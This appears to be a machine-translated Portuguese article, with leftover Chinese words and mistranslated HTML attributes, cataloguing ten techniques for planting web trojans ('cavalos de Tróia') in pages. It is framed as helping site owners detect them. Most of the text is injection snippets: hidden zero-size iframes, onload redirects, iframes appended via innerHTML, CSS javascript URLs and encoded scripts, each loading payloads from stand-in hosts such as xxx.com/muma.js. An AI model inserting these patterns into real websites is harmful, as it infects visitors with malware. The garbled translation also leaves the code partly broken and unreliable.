Este artigo descreve os métodos que os bandidos costumam usar para travar cavalos de Tróia em páginas da web, para que você possa impedir suas próprias páginas da web, desde que detecte esses locais que são frequentemente usados para travar cavalos de Tróia, é fácil encontrar a localização. dos troianos.
1: Cavalo pendurado em moldura
<iframe src=endereço largura=0 altura=0></iframe>
Você pode inserir links de sites maliciosos no endereço, etc.
Dois: montagem de arquivo js
Contanto que seja um arquivo JS, ele pode ser modificado maliciosamente e, portanto, vinculado a código malicioso. Geralmente, o código JS referenciado por todo o site tem maior probabilidade de estar vinculado a cavalos de Tróia. a esquerda ou a parte inferior do código JS, os bandidos gostam de combinar código malicioso com códigos normais que estão ocultos com muitos espaços ou retornos de carro, portanto, você deve verificar se a página de código JS foi esticada intencionalmente.
Três: criptografia de deformação js
<linguagem SCRIPT=JScript.Encode src=http://www.xxx.com/muma.txt></script>
muma.txt pode ser alterado para qualquer sufixo
Quatro: cavalo pendurado no corpo
<body onload=window.location='address';></body>
Cinco: cavalo escondido pendurado
top.document.body.innerHTML = top.document.body.innerHTML + '/r/n<iframe src=http://www.xxx.com/muma.htm/></iframe>';
Seis: Cavalo pendurado em CSS
corpo {
imagem de fundo: url('javascript:document.write(<script src=http://www.XXX.net/muma.js></script>)')}
Este método é mais implacável e mais difícil de detectar.
Sete:cavalo pendurado JAJA
<linguagem SCRIPT=javascript>
window.open (endereço,,barra de ferramentas=não,localização=não,diretórios=não,status=não,menubar=não,barras de rolagem=não,largura=1,altura=1);
</script>
Oito: disfarce de imagem
<html>
<iframe src=网马地址 height=0 width=0></iframe>
<img src=endereço da imagem></center>
</html>
Nove: Chamada de disfarce
<frameset rows=444,0 cols=*>
<frame src=Abrir página da web framborder=sem rolagem=auto noresize marginwidth=0margingheight=0>
<frame src=网马地址 frameborder=no scrolling=noresize marginwidth=0margingheight=0>
</frameset>
Dez: Decepção Avançada
<a href=http://www.163.com (confunde o endereço de conexão e mostra que este endereço aponta para o endereço do Trojan) onMouseOver=www_163_com();> Conteúdo a ser exibido na página</a>;
<linguagem SCRIPT=JavaScript>
função www_163_com()
{
var url=endereço líquido do cavalo;
open(url,NewWindow,toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10, superior=10);
}
</SCRIPT>